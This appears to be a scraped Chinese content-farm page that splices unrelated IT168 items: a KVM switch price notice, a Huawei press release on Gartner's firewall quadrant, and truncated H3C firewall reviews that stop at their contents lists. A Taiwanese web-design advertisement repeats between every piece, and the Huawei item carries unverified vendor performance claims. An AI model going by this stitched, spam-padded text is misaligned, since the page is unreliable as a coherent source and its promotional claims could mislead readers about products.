如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司、台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦、台中網頁設計公司推薦專業設計師”嚨底家”!!

宏正 CS22UKVM切換器”上海勁嘉”售161元

網站內容來源http://server.it168.com/

宏正 CS22UKVM切換器”上海勁嘉”售161元

2017-03-07 08:22    原創  作者: 上海分站 編輯:
0購買

    【IT168 上海行情】宏正 CS22U是一款KVM切換器,能幫助用戶通過簡單的設備控制多台電腦。其最高支持2048×1536分辨率、3路輸入和4路輸出,通過外接式切換按鍵進行切換,滿足用戶使用需求,目前這款在“上海勁嘉”報價161元,有需要的朋友不妨關注一下。

  宏正 CS22U連接一組USB鍵鼠、屏幕即可切換使用二台計算機端,精巧的機身外型,內建0.9公尺的連接線,支持多功能鼠標,節省桌面空間的解決方案- 可將主裝置放於桌面下,僅保留此切換按鍵於桌面,大幅節省桌面空間,跨平台支援–Windows 2000/XP/Vista、Mac、Linux與Sun,一體成型的設計,高視訊分辨率–最高達2048 x 1536;支援DDC2B,無須外接電源,支持羅技、微軟等大廠多數的無線/藍芽及一般鍵鼠組,使用無線/藍芽鍵鼠組時,需將USB接收器安裝於KVM的鼠標側。

  [參考價格]161元

  [商家名稱]上海勁嘉電腦配件有限公司

  [聯繫地址]上海市徐匯區漕溪北路41號匯嘉大廈1103室

  [聯繫方式]021-54900115 021-64688618 13601954068

, ,

本文產品
KVM切換器類型:USB KVM切換器
KVM端口:2端口
切換方式:外接式切換按鍵
支持分辨率:2048×1536 網上購買網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司、台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦、台中網頁設計公司推薦專業設計師"嚨底家"!!

華為邁入Gartner企業防火牆魔力象限的挑戰者象限

網站內容來源http://server.it168.com/

華為邁入Gartner企業防火牆魔力象限的挑戰者象限

2017-07-19 10:10    原創  作者: 閆志坤 編輯:
0購買

  【IT168 資訊】近日,華為宣布,在Gartner最新發布的2017年企業防火牆魔力象限(Magic Quadrant)報告中,華為進入“挑戰者”象限。Gartner報告從願景的前瞻性和對戰略的執行力兩個維度對廠商進行衡量和評估,本次華為晉陞為挑戰者(Challengers)憑藉的是持續快速增長的市場份額以及由高性能軟、硬件防火牆和雲沙箱構築的立體防禦體系。如今,華為下一代防火牆已經成為全球眾多企業部署網絡安全方案優選的產品之一。

▲2017年企業防火牆魔力象限

  華為交換機與企業網關產品線總裁胡克文表示:“我們認為華為被評為挑戰者,是對華為堅持為客戶打造基於全局感知的下一代防火牆策略的肯定。同時,這也是對華為與行業客戶聯合創新,解決安全挑戰,持續投入產品研發的充分認可。”

       隨着雲計算的廣泛應用,企業基礎架構中遭受攻擊的範圍持續擴大,特別是面臨的未知威脅越來越多。企業需要的是能夠將安全防護能力按需編排、按需調用,以及基於AI和機器學習能力的主動網絡安全防禦系統,從而能智能的抵禦未知威脅。華為將為企業構築以服務化、智能化、自動化為核心的新一代網絡安全,打造全網智能威脅檢測和主動防禦的安全體系。”

  雲安全風險成為企業遷移業務上雲最大的顧慮,Gartner在報告中指出,“眾多企業正在尋求能夠提供基於雲的惡意軟件檢測的防火牆廠商,幫助他們實現高級威脅檢測,相對於獨立部署沙箱,性價比更高。

   華為下一代防火牆集成了高效的雲沙箱檢測服務,每天可檢測上百萬個文件,比業界平均水平早30小時發現零日漏洞。企業用戶可以快速獲取全球最新威脅情報及在線專業安全服務支持,對可疑流量進行深度檢測,將未知威脅防患於未然。

     同時,華為將安全能力服務化,在雲數據中心邊界提供南北向流量的租戶級防護,並虛擬機間東西向流量檢測,同時對SaaS應用做到細粒度感知和管控;安全作為網絡的服務,可被SDN控制器按需調用,滿足“按需、彈性”的雲安全訴求。

  華為除了堅持技術創新,為客戶提供差異化方案外,在企業防火牆領域保持了高速的市場增長。根據2016年度Gartner企業防火牆市場份額報告显示,華為防火牆全年銷售收入同比增長率全球第一。

      目前,華為下一代防火牆已服務於全球70多個國家的累計超過100,000家企業,幫助客戶構建主動預測的全網智能威脅檢測和防禦體系,實現数字化轉型。

網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司、台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦、台中網頁設計公司推薦專業設計師"嚨底家"!!

H3C新一代F100系列防火牆評測報告

網站內容來源http://server.it168.com/

H3C新一代F100系列防火牆評測報告

2013-03-22 00:00    原創  作者: 杜飛 編輯:
0購買

【IT168評測】隨着網絡應用在中小企業的深入發展,中小企業對於網絡安全的需求也越來越強烈。而傳統的網絡安全設備可以幫助中小企業防禦病毒、蠕蟲及應用層攻擊,但是由於缺乏有效的監管,中小企業內網用戶的P2P下載、在線視頻等大量佔用着企業有限的出口帶寬,同時也給企業帶來了潛在的安全威脅。針對中小企業所面臨的這些安全威脅以及移動辦公等全新的安全需求,H3C面向中小企業用戶推出了整合防火牆、VPN、鏈路負載均衡、入侵防禦、應用層流量識別、防病毒功能與一體的新一代F100系列防火牆,幫助中小企業用戶一體化解決網絡環境中的安全問題。

H3C F100系列防火牆包括多個型號,豐富了對中低端網絡環境下的產品覆蓋。其中不得不提的是F100-A-G和F100-S-G兩款性價比超值的網絡安全利器。作為F100系列產品家族中的佼佼者,100-A-G和F100-S-G從設計之初就充分考慮到中小企業在資金和專業技術環節中的不足,以滿足中小企業不斷變化的網絡環境和日益豐富網絡應用的需要。

▲F100系列防火牆產品圖

  H3C把F100新一代防火牆的高性價比、易用性、易管理性作為產品設計的首要原則。最大限度的降低設備配置以及管理的難度,同時融合多種網絡安全功能,也就是使用最簡易的方式,讓中小企業用戶享受到原來只有高端專業用戶才能體驗到的安全特性。下面我們就針對F100-A-G和F100-S-G進行全面的評測體驗,幫助中小企業用戶充分的了解這款設備。

  本次評測流程介紹:

一、F100系列外觀介紹
二、F100系列特性介紹
1、多核硬件架構
2、基礎安全防護
3、策略配置
4、深度防護
5、流量管理
6、內置多種VPN特性
7、多ISP鏈路智能選路
8、高可靠性
9、多業務特性
10、智能管理
三、F100系列功能配置
1、開啟HTTP功能
2、WEB配置
3、NAT 地址轉換
4、攻擊防範配置
5、VPN配置
6、IPv6安全防護
7、性能測試
F100-S-G性能測試
F100-A-G性能測試
8、穩定性
四、評測總結

上一頁
1 內容導航

  • 第1頁:
  • 第3頁:
  • 第5頁:
  • 第7頁:
  • 第9頁:
  • 第11頁:
  • 第13頁:
  • 第2頁:
  • 第4頁:
  • 第6頁:
  • 第8頁:
  • 第10頁:
  • 第12頁:
  • 第14頁:

, , , , ,
網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司、台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦、台中網頁設計公司推薦專業設計師”嚨底家”!!

H3C SecPath F1000-C-G防火牆獨家評測

網站內容來源http://server.it168.com/

H3C SecPath F1000-C-G防火牆獨家評測

2013-10-17 00:00    原創  作者: 杜飛 編輯:
0購買

  評測摘要:H3C SecPath F1000-C-G防火牆可輕鬆實現4G吞吐量,每秒新建連接數高達3萬條,可存儲100萬個鏈接,性能卓越;支持雙機配置、會話同步、秒級切換、鏈路狀況探測、鏈路聚合等高可靠特性;多出口智能鏈路負載均衡、針對連接數以及帶寬的限制、基於黑白名單用戶URL訪問控制、NAT、豐富的日誌審計等多種應用。

【IT168評測】隨着互聯網化的逐步深入,企業所面臨的安全威脅正在成倍遞增。網絡安全威脅不僅來自互聯網,由於工作疏忽等各種原因,導致局域網內病毒傳播、信息泄露的事件也時有發生。針對企業所面臨的這些安全威脅和安全接入互聯需求,H3C推出新一代SecPath F1000-C-G防火牆,該設備是H3C 面向大中型企業用戶開發的新一代專業防火牆,支持Web攻擊防範、內網安全、流量監控、郵件過濾、網頁過濾、應用層過濾等功能,融合多種實用功能於一體的F1000-C-G可以有效保證企業用戶的接入安全。

接下來IT168安全頻道就將針對H3C SecPath F1000-C-G防火牆進行測試,本次測試內容涉及設備外觀、產品特性、性能以及諸多功能配置等方面。希望我們的本次評測能對您的防火牆產品選型有所幫助。

  本次評測流程介紹:

一、F1000外觀介紹
二、F1000性能測試
1、新建連接速率
2、併發連接數
3、吞吐量
三、F1000特性介紹
四、F1000功能配置
1、 開啟HTTP功能
2、 WEB配置功能
3、 NAT 地址轉換
4、 多出口智能鏈路負載均衡
5、 用戶訪問控制
6、 SSL VPN設置
7、 日誌審計
8、 穩定運行
五、本次測試總結

點擊這裏進入測試內容:

上一頁
1 內容導航

  • 第1頁:
  • 第3頁:
  • 第5頁:
  • 第7頁:
  • 第9頁:
  • 第11頁:
  • 第2頁:
  • 第4頁:
  • 第6頁:
  • 第8頁:
  • 第10頁:

, , , ,
網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司、台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦、台中網頁設計公司推薦專業設計師”嚨底家”!!